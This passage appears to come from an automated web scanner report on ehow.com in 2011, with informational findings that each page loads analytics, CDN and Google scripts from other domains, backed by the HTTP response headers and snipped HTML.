http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:11 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=3990; expires=Thu, 02-Feb-2012 15:16:11 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44437

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Home Security Systems Guide | eHow.com
</title
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-haqfBw.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.523. http://www.ehow.com/topic_401_home-alarms.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_401_home-alarms.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:16 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=401; expires=Thu, 02-Feb-2012 15:16:16 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51260

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Home Alarms - Home Alarm Systems | eHow.com
</
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-haqfBw.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.524. http://www.ehow.com/topic_4028_preparing-flu-season.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_4028_preparing-flu-season.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:28 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=4028; expires=Thu, 02-Feb-2012 15:16:28 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42359

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Preparing for Flu Season | eHow.com
</title>

...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-haqfBw.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.525. http://www.ehow.com/topic_4127_home-alarm-system-guide.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_4127_home-alarm-system-guide.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:06 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=4127; expires=Thu, 02-Feb-2012 15:16:06 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41727

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Home Alarm System Guide | eHow.com
</title>

...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-haqfBw.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.526. http://www.ehow.com/topic_429_all-flu.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_429_all-flu.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:35 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=429; expires=Thu, 02-Feb-2012 15:16:35 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44774

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
All About the Flu - Avoid the Flu | eHow.com
<
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-haqfBw.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.527. http://www.ehow.com/topic_4989_photo-sharing-101.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_4989_photo-sharing-101.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:20 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=4989; expires=Thu, 02-Feb-2012 15:16:20 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42923

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Photo Sharing 101 | eHow.com
</title>
       <meta
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-haqfBw.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.528. http://www.ehow.com/topic_49_treating-colds-flus.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_49_treating-colds-flus.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:38 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=49; expires=Thu, 02-Feb-2012 15:16:37 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37688

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Treat Colds and Flus - Treating Colds and Flus
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-haqfBw.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.529. http://www.ehow.com/topic_5023_jog-lose-weight.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_5023_jog-lose-weight.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:25 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=5023; expires=Thu, 02-Feb-2012 15:16:25 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43521

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Jog & Lose Weight | eHow.com
</title>
       <meta
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-haqfBw.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.530. http://www.ehow.com/topic_689_black-white-photos.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_689_black-white-photos.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:20 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=689; expires=Thu, 02-Feb-2012 15:16:20 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53154

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Take Black and White Photos - Taking Black and
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-haqfBw.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.531. http://www.ehow.com/topic_745_capture-enduring-wedding-photos.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_745_capture-enduring-wedding-photos.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:21 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=745; expires=Thu, 02-Feb-2012 15:16:21 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39720

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Capture Enduring Wedding Photos - About Wedding
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-haqfBw.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.532. http://www.ehow.com/topic_7853_floor-fountains-guide.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_7853_floor-fountains-guide.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:03 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=7853; expires=Thu, 02-Feb-2012 15:16:03 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40881

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Floor Fountains Guide | eHow.com
</title>
       <
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-haqfBw.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.533. http://www.ehow.com/topic_7992_floor-water-fountains-101.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_7992_floor-water-fountains-101.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:01 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=7992; expires=Thu, 02-Feb-2012 15:16:01 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38067

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Floor Water Fountains 101 | eHow.com
</title>
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-haqfBw.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.534. http://www.ehow.com/topic_8016_outdoor-garden-fountains-guide.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_8016_outdoor-garden-fountains-guide.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:35 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=8016; expires=Thu, 02-Feb-2012 15:15:35 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40814

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Outdoor Garden Fountains Guide | eHow.com
</ti
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-haqfBw.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.535. http://www.ehow.com/topic_8047_water-garden-fountains-101.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/topic_8047_water-garden-fountains-101.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:49 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: recentviewed=8047; expires=Thu, 02-Feb-2012 15:15:49 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41352

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>
Water Garden Fountains 101 | eHow.com
</title>
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-haqfBw.css"/>

   <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/quick-guides-bagOlw.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.536. http://www.ehow.com/toys-and-games/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/toys-and-games/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:37 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72327

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Toys & Games - How To Information | eHow.com</tit
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.537. http://www.ehow.com/unavailable.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/unavailable.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:55 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22996

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>Browse How to Videos and How to Articles | ehow.c
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/common-JWU1-g.js"></script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://vs.dmtracker.com/tags/vs.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F08747"></script>
...[SNIP]...



       <script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...
</div>

           <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

18.538. http://www.ehow.com/us-travel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ehow.com
Path:	/us-travel/

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js
http://b.scorecardresearch.com/beacon.js
http://js.revsci.net/gateway/gw.js?csid=F08747
http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js
http://vs.dmtracker.com/tags/vs.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:37 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 74709

<!DOCTYPE html>
<html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/">
<head>
       <title>US Travel - How To Information | eHow.com</title>
...[SNIP]...
</style>
       <script type="text/javascript" src="http://ui.ehowcdn.com/content/compressed/en-US/commonLite-V2JceA.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://api.blogburst.com/v1.0/WidgetDeliveryProxy.js"></script>
...[SNIP]...
